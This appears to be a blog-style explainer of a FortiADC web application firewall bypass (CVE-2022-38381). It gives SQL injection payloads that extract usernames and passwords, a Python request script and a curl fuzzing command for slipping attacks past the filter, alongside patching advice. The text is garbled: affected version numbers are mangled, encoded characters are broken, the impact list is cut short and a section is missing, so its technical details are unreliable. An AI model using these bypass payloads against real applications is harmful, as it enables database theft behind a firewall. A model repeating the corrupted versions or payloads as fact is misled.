FortiADC is a popular Application Delivery Controller made by Fortinet, often used to balance the load and protect web applications. In 2022, a critical vulnerability—CVE-2022-38381—was found in the way FortiADC handled malformed HTTP requests. This weakness gave remote attackers a way to sneak around important Web Application Firewall (WAF) protections, particularly those that shield apps from SQL Injection (SQLi) and Cross-Site Scripting (XSS) attacks.
Below, we break down the vulnerability, show example code, and explain how an attacker could exploit this bug in plain language.
1. What is CVE-2022-38381?
CVE-2022-38381 is an improper handling of malformed request vulnerability (CWE-228) affecting these FortiADC versions:
7..–7..2
With this flaw, a remote attacker can send specifically crafted (malformed) HTTP requests that FortiADC’s WAF fails to properly check. This oversight allows dangerous payloads to reach the web application itself—bypassing protection against SQLi and XSS attacks.
See Fortinet’s advisory for official info.
2. Understanding the Vulnerability
A web application firewall (WAF) is supposed to inspect every request and block any that look dangerous. But FortiADC’s WAF sometimes mishandled HTTP requests that did not conform exactly to standards—a scenario known as “malformed requests.”
For example, a typical HTTP request might look like this
GET /index.php?search=test HTTP/1.1
Host: example.com
But what if the request is broken up strangely, or certain headers are doubled, missing, or malformed? FortiADC might not filter it properly, and malicious inputs could sneak through.
3. How Could an Attacker Exploit CVE-2022-38381?
Let’s walk through a simplified attack scenario.
Imagine a WAF rule that blocks the string UNION SELECT (classic SQLi payload) in the URL or query.
A classic attack that would be blocked
GET /index.php?search=a' UNION SELECT username, password FROM users -- HTTP/1.1
Host: victim.com
FortiADC’s WAF (when working) would spot UNION SELECT and block the request.
Malformed Request to Bypass WAF
However, because of CVE-2022-38381, the attacker could split or mangle the payload so the WAF misses it, but the backend PHP script still parses it correctly.
Example 1: Exploiting with Header Splitting
GET /index.php?search=a' UNI
ON SELECT username, password FROM users -- HTTP/1.1
Host: victim.com
Abusing how the server decodes %u Unicode or double-encoding
GET /index.php?search=a'%55NION%20SELECT username, password FROM users -- HTTP/1.1
Host: victim.com
Creating multi-line query parameters or abusing chunked transfer encoding (example in Python)
import requests
url = "http://victim.com/index.php";
malformed_params = "search=a'%d%aUNION SELECT username, password FROM users -- "
r = requests.get(url, params=malformed_params)
print(r.text)
If the payload crosses a “malformed” section, the WAF might skip filter checks.
- The backend web server (like Apache or nginx) may still assemble the parameters *correctly*, so the malicious query hits the application as the attacker meant.
4. Real-World Impact
This bug allows attackers to bypass FortiADC’s WAF SQLi and XSS protection entirely. In the real world, attackers can:
Perform other attacks usually blocked by the WAF
All this without needing any privileges or insider access—just malformed HTTP requests.
Tools
- Use Burp Suite or OWASP ZAP to craft malformed requests
- Combine with curl or requests to fuzz for bypasses
curl -v "http://victim.com/index.php?search=a%d%aUNION SELECT ..."
6. Remediation & Fix
Upgrade FortiADC:
7..3 and later
Reference:
- Fortinet FG-IR-22-242 Advisory
Tighten backend validation: Filter for dangerous input *after* the WAF, inside your application.
- Block suspicious encodings/repeated headers in your HTTP server (nginx, Apache) config.
7. Learn More
- FortiADC Product Page
- NVD Entry for CVE-2022-38381
- Understanding CWE-228
8. Conclusion
CVE-2022-38381 shows that even mature devices like FortiADC can have blind spots if handling of data is imperfect. Remote attackers can leverage malformed requests to sidestep WAF protections, making it crucial to patch early and audit your WAF logs for odd request formatting. Always layer your web application security, and never rely on a single line of defense.
Timeline
Published on: 11/02/2022 12:15:00 UTC
Last modified on: 11/04/2022 15:03:00 UTC